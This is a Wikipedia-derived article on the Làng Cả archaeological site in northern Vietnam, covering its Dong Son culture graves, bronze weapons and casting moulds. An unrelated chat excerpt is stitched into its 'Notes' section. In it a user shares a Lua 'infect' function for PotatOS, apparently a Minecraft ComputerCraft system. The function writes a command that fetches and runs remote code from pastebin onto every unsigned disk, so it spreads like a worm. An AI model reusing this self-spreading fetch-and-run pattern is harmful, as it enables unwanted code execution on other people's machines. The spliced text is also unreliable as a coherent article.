Làng Cả

Làng Cả (Việt Trì) is an archaeological site in the Red River Delta in northern Vietnam. Excavations there yielded a number of coffins containing relics of the Bronze Age Dong Son culture.[1][2]

The site is located just upstream from the merging of the Red River and the Black River near Việt Trì.[1]

A single radiocarbon dating sample from coffin wood that was exhumed from the site suggested that the artefacts were from the second phase of the Dong Son culture, estimated to be between 382 BCE and 195 BCE.[1]

309 graves were described in Vietnamese archaeological records, but no cemetery plans or a list of graves and contents was recorded. The Vietnamese archaeologists Trinh Sinh and Ngo Si Hong did refer to recorded evidence of the presence of comparatively wealthy graves in certain parts of the cemetery. The graves in the eastern sector had a paucity of material goods enclosed in the coffins, while those in the west were much wealthier and accounted for 85.8% of the bronze that was recovered from the burial site.[1]

One exhumed grave was postulated to belong to a specialist bronze worker, since he was buried with the tools of a metal worker: a spearhead, sword hilt, bell and ceramic moulds used in casting axes. The mould had a capacity of holding up to 12 kg of molten metal.[1]

The record of the excavation recorded that 217 different types of grave goods were observed, predominantly of bronze. The bronze items were mostly weapons, with there being 62 spearheads, 36 axes, three knives and six daggers. Some of the weapons were decorated with geometric patterns and pictorial scenes of deer, dogs and people travelling on water transport. There were also bronze vessels, including four thap and four au, six bells and a miniature drum.[1]

The excavation yielded only twenty ceramic vessels, and no iron was found, similar to the lack of iron reported at Viet Khe and Chau Can. One of the moulds was designed to cast a sword hilt, and it was postulated that iron might have been used to cast the blade, although the excavations showed that iron was likely to have been in short supply during the time.[1]

Notes

gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?

References

  • Higham, Charles (1996). The Bronze Age of Southeast Asia. Cambridge World Archaeology. ISBN 0-521-56505-7.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.